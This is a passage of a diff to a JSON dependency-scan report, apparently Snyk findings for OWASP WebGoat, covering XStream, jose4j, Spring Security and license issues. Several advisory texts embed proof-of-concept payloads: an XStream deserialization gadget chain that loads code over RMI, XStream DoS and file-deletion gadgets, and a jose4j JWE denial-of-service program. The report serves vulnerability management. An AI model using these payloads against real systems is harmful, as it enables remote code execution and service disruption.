-                          "version": "3.4.11"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.20.Final"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.19"
                         }
                       ],
                       "is_drop": false
@@ -14217,7 +1700,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000037-0000-4000-8000-000000000037",
+              "id": "00000000-0000-0000-0000-000000000009",
               "type": "fixes"
             }
           }
@@ -14227,13 +1710,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n## References\n- [CVE-2020-26259 Details](https://x-stream.github.io/CVE-2020-26259.html)\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738)\n- [PoC in GitHub](https://github.com/jas502n/CVE-2020-26259)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'\u003e\r\n      \u003cm__DTMXRTreeFrag\u003e\r\n        \u003cm__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'\u003e\r\n          \u003cm__size\u003e-10086\u003c/m__size\u003e\r\n          \u003cm__mgrDefault\u003e\r\n            \u003c__overrideDefaultParser\u003efalse\u003c/__overrideDefaultParser\u003e\r\n            \u003cm__incremental\u003efalse\u003c/m__incremental\u003e\r\n            \u003cm__source__location\u003efalse\u003c/m__source__location\u003e\r\n            \u003cm__dtms\u003e\r\n              \u003cnull/\u003e\r\n            \u003c/m__dtms\u003e\r\n            \u003cm__defaultHandler/\u003e\r\n          \u003c/m__mgrDefault\u003e\r\n          \u003cm__shouldStripWS\u003efalse\u003c/m__shouldStripWS\u003e\r\n          \u003cm__indexing\u003efalse\u003c/m__indexing\u003e\r\n          \u003cm__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'\u003e\r\n            \u003cfPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'\u003e\r\n              \u003cjavax.sql.rowset.BaseRowSet\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cconcurrency\u003e1008\u003c/concurrency\u003e\r\n                  \u003cescapeProcessing\u003etrue\u003c/escapeProcessing\u003e\r\n                  \u003cfetchDir\u003e1000\u003c/fetchDir\u003e\r\n                  \u003cfetchSize\u003e0\u003c/fetchSize\u003e\r\n                  \u003cisolation\u003e2\u003c/isolation\u003e\r\n                  \u003cmaxFieldSize\u003e0\u003c/maxFieldSize\u003e\r\n                  \u003cmaxRows\u003e0\u003c/maxRows\u003e\r\n                  \u003cqueryTimeout\u003e0\u003c/queryTimeout\u003e\r\n                  \u003creadOnly\u003etrue\u003c/readOnly\u003e\r\n                  \u003crowSetType\u003e1004\u003c/rowSetType\u003e\r\n                  \u003cshowDeleted\u003efalse\u003c/showDeleted\u003e\r\n                  \u003cdataSource\u003ermi://localhost:15000/CallRemoteMethod\u003c/dataSource\u003e\r\n                  \u003clisteners/\u003e\r\n                  \u003cparams/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.sql.rowset.BaseRowSet\u003e\r\n              \u003ccom.sun.rowset.JdbcRowSetImpl\u003e\r\n                \u003cdefault/\u003e\r\n              \u003c/com.sun.rowset.JdbcRowSetImpl\u003e\r\n            \u003c/fPullParserConfig\u003e\r\n            \u003cfConfigSetInput\u003e\r\n              \u003cclass\u003ecom.sun.rowset.JdbcRowSetImpl\u003c/class\u003e\r\n              \u003cname\u003esetAutoCommit\u003c/name\u003e\r\n              \u003cparameter-types\u003e\r\n                \u003cclass\u003eboolean\u003c/class\u003e\r\n              \u003c/parameter-types\u003e\r\n            \u003c/fConfigSetInput\u003e\r\n            \u003cfConfigParse reference='../fConfigSetInput'/\u003e\r\n            \u003cfParseInProgress\u003efalse\u003c/fParseInProgress\u003e\r\n          \u003c/m__incrementalSAXSource\u003e\r\n          \u003cm__walker\u003e\r\n            \u003cnextIsRaw\u003efalse\u003c/nextIsRaw\u003e\r\n          \u003c/m__walker\u003e\r\n          \u003cm__endDocumentOccured\u003efalse\u003c/m__endDocumentOccured\u003e\r\n          \u003cm__idAttributes/\u003e\r\n          \u003cm__textPendingStart\u003e-1\u003c/m__textPendingStart\u003e\r\n          \u003cm__useSourceLocationProperty\u003efalse\u003c/m__useSourceLocationProperty\u003e\r\n          \u003cm__pastFirstElement\u003efalse\u003c/m__pastFirstElement\u003e\r\n        \u003c/m__dtm\u003e\r\n        \u003cm__dtmIdentity\u003e1\u003c/m__dtmIdentity\u003e\r\n      \u003c/m__DTMXRTreeFrag\u003e\r\n      \u003cm__dtmRoot\u003e1\u003c/m__dtmRoot\u003e\r\n      \u003cm__allowRelease\u003efalse\u003c/m__allowRelease\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many o",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -14244,7 +1727,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000038-0000-4000-8000-000000000038",
+          "key": "00000000-0000-0000-0000-000000000010",
           "locations": [
             {
               "package": {
@@ -14255,18 +1738,118 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 343
+          "problems": [
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-hrcp-8f3q-4w2c", "source": "ghsa" },
+            { "id": "CVE-2021-21351", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T12:42:18.446867Z",
+              "credits": ["wh1t3P1g"],
+              "cvss_base_score": 5.4,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.4,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-06-27T16:16:41.057455Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.947889Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:55.184426Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:10.543668Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T12:39:12Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99631",
+                "probability": "0.91268"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-18T05:02:33.720695Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:22Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21351.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21351.yaml"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Arbitrary File Deletion"
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 338 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000038-0000-4000-8000-000000000038",
+        "id": "00000000-0000-0000-0000-000000000010",
         "links": {},
         "relationships": {
           "fix": {
@@ -14280,11 +1863,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.15"
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -14293,7 +1876,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000038-0000-4000-8000-000000000038",
+              "id": "00000000-0000-0000-0000-000000000010",
               "type": "fixes"
             }
           }
@@ -14303,46 +1886,123 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003clinked-hash-set\u003e\r\n  \u003csun.reflect.annotation.AnnotationInvocationHandler serialization='custom'\u003e\r\n    \u003csun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n      \u003cdefault\u003e\r\n        \u003cmemberValues class='javax.script.SimpleBindings'\u003e\r\n          \u003cmap class='javax.script.SimpleBindings' reference='..'/\u003e\r\n        \u003c/memberValues\u003e\r\n        \u003ctype\u003ejavax.xml.transform.Templates\u003c/type\u003e\r\n      \u003c/default\u003e\r\n    \u003c/sun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n  \u003c/sun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n\u003c/linked-hash-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39140.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n",
+          "description": "## Overview\n[org.bitbucket.b_c:jose4j](https://bitbucket.org/b_c/jose4j) is a robust and easy to use open source implementation of JSON Web Token (JWT) and the JOSE specification suite (JWS, JWE, and JWK). It is written in Java and relies solely on the JCA APIs for cryptography. Please see https://bitbucket.org/b_c/jose4j/wiki/Home for more info, examples, etc...\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large `p2c` (PBES2 Count) value. An attacker can cause the application to consume excessive CPU resources by supplying an unusually high PBES2 Count value.\n## PoC\n```java\r\n\r\nimport org.jose4j.jwa.AlgorithmConstraints;\r\nimport org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;\r\nimport org.jose4j.jwe.JsonWebEncryption;\r\nimport org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;\r\nimport org.jose4j.keys.AesKey;\r\nimport org.jose4j.lang.ByteUtil;\r\n\r\nimport java.security.Key;\r\n\r\npublic class jwt {\r\n    public static void main(String[] argc)throws Exception{\r\n        Key key = new AesKey(ByteUtil.randomBytes(16));\r\n        JsonWebEncryption jwe = new JsonWebEncryption();\r\n        jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,\r\n                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));\r\n        jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,\r\n                ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));\r\n        jwe.setKey(key);\r\n        jwe.setCompactSerialization(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w\");\r\n        System.out.println(\"Payload: \" + jwe.getPayload());\r\n    }\r\n}\r\n\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.bitbucket.b_c:jose4j` to version 0.9.4 or higher.\n## References\n- [Bitbucket Commit](https://bitbucket.org/b_c/jose4j/commits/1afaa1e174b3)\n- [Bitbucket Issue](https://bitbucket.org/b_c/jose4j/issues/212)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
+                { "name": "org.bitbucket.b_c:jose4j", "version": "0.9.3" }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000003a-0000-4000-8000-00000000003a",
+          "key": "00000000-0000-0000-0000-000000000011",
           "locations": [
             {
               "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
+                "name": "org.bitbucket.b_c:jose4j",
+                "version": "0.9.3"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 180
-            }
+          "problems": [
+            { "id": "CWE-400", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,0.9.4)"],
+              "created_at": "2023-12-27T12:57:23.732781Z",
+              "credits": ["Jesse Yang"],
+              "cvss_base_score": 7.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:09:35.037702Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-05-09T13:33:06.434226Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+              "disclosed_at": "2023-12-25T22:44:43Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.54217",
+                "probability": "0.00316"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-ORGBITBUCKETBC-6139942",
+              "initially_fixed_in_versions": ["0.9.4"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-05-09T13:33:06.434226Z",
+              "package_name": "org.bitbucket.b_c:jose4j",
+              "package_version": "",
+              "published_at": "2023-12-27T13:04:53.433191Z",
+              "references": [
+                {
+                  "title": "Bitbucket Commit",
+                  "url": "https://bitbucket.org/b_c/jose4j/commits/1afaa1e174b3"
+                },
+                {
+                  "title": "Bitbucket Issue",
+                  "url": "https://bitbucket.org/b_c/jose4j/issues/212"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2023-51775", "source": "cve" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 194 } },
+          "suppression": {
+            "created_at": "2025-11-19T13:57:21.637Z",
+            "justification": "Is not used",
+            "path": ["*"],
+            "policy": { "id": "b1aee16f-e39e-4427-a051-81451cb61a4f" },
+            "status": "ignored"
           },
           "title": "Denial of Service (DoS)"
         },
-        "id": "0000003a-0000-4000-8000-00000000003a",
+        "id": "00000000-0000-0000-0000-000000000011",
         "links": {},
         "relationships": {
           "fix": {
@@ -14350,17 +2010,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
+                  "package_name": "org.bitbucket.b_c:jose4j",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
+                          "name": "org.bitbucket.b_c:jose4j",
+                          "version": "0.9.4"
                         }
                       ],
                       "is_drop": false
@@ -14369,9 +2029,40 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000003a-0000-4000-8000-00000000003a",
+              "id": "00000000-0000-0000-0000-000000000011",
               "type": "fixes"
             }
+          },
+          "policy": {
+            "data": {
+              "attributes": {
+                "policies": [
+                  {
+                    "applied_policy": {
+                      "action_type": "ignore",
+                      "ignore": {
+                        "created": "2025-11-19T13:57:21.637Z",
+                        "disregard_if_fixable": false,
+                        "ignored_by": {
+                          "email": "catalin.iuga@snyk.io",
+                          "id": "41f56271-2447-4a42-9708-7bbeec29acd0",
+                          "name": "Catalin"
+                        },
+                        "path": ["*"],
+                        "reason": "Is not used",
+                        "reason_type": "not-vulnerable",
+                        "source": "api"
+                      }
+                    },
+                    "id": "b1aee16f-e39e-4427-a051-81451cb61a4f",
+                    "type": "legacy_policy_snapshot"
+                  }
+                ]
+              },
+              "id": "059a3cf2-97e8-4a1d-863c-02c152ffedf1",
+              "type": "policies"
+            },
+            "links": {}
           }
         },
         "type": "findings"
@@ -14379,97 +2070,74 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n\nAffected versions of this package are vulnerable to Authentication Bypass when directly using the `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` method and passing a null authentication parameter to it. \r\n\r\n**Note:**\r\n\r\nAn application is *not* vulnerable if any of the following is true:\r\n\r\n1) the application does not use `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` directly\r\n\r\n2) the application does not pass `null` to `AuthenticationTrustResolver.isFullyAuthenticated`\r\n\r\n3) the application only uses `isFullyAuthenticated` via [Method Security](https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html) or [HTTP Request Security](https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html)\n## Remediation\nUpgrade `org.springframework.security:spring-security-oauth2-client` to version 6.1.7, 6.2.2 or higher.\n## References\n- [Advisory](https://spring.io/security/cve-2024-22234)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569)\n",
+          "description": "Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
-                {
-                  "name": "org.springframework.security:spring-security-oauth2-client",
-                  "version": "6.1.5"
-                }
+                { "name": "org.asciidoctor:asciidoctorj", "version": "3.0.0" },
+                { "name": "org.jruby:jruby", "version": "10.0.0.1" },
+                { "name": "org.jruby:jruby-base", "version": "10.0.0.1" },
+                { "name": "com.github.jnr:jnr-posix", "version": "3.1.20" }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000003b-0000-4000-8000-00000000003b",
+          "key": "00000000-0000-0000-0000-000000000012",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.security:spring-security-oauth2-client",
-                "version": "6.1.5"
+                "name": "com.github.jnr:jnr-posix",
+                "version": "3.1.20"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 128
-            }
-          },
-          "title": "Authentication Bypass"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[3.0.45,)"],
+              "created_at": "2025-03-10T06:17:06.524Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "id": "snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)",
+              "instructions": [],
+              "license": "(EPL-1.0 OR GPL-2.0 OR LGPL-2.1)",
+              "package_name": "com.github.jnr:jnr-posix",
+              "package_version": "",
+              "published_at": "2025-03-10T06:17:06.524Z",
+              "severity": "high",
+              "source": "snyk_license"
+            }
+          ],
+          "rating": { "severity": "high" },
+          "risk": {},
+          "title": "Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1"
         },
-        "id": "0000003b-0000-4000-8000-00000000003b",
+        "id": "00000000-0000-0000-0000-000000000012",
         "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.security:spring-security-oauth2-client",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "org.springframework.security:spring-security-oauth2-client",
-                          "version": "6.1.7"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000003b-0000-4000-8000-00000000003b",
-              "type": "fixes"
-            }
-          }
-        },
+        "relationships": {},
         "type": "findings"
       },
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'\u003e\r\n                \u003cpart\u003e\r\n                  \u003cdataHead\u003e\r\n                    \u003ctail/\u003e\r\n                    \u003chead\u003e\r\n                      \u003cdata class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'\u003e\r\n                        \u003clen\u003e3\u003c/len\u003e\r\n                        \u003cdata\u003eAQID\u003c/data\u003e\r\n                      \u003c/data\u003e\r\n                    \u003c/head\u003e\r\n                  \u003c/dataHead\u003e\r\n                  \u003ccontentTransferEncoding\u003ebase64\u003c/contentTransferEncoding\u003e\r\n                  \u003cmsg\u003e\r\n                    \u003cit class='java.util.ArrayList$Itr'\u003e\r\n                      \u003ccursor\u003e0\u003c/cursor\u003e\r\n                      \u003clastRet\u003e1\u003c/lastRet\u003e\r\n                      \u003cexpectedModCount\u003e4\u003c/expectedModCount\u003e\r\n                        \u003couter-class\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n      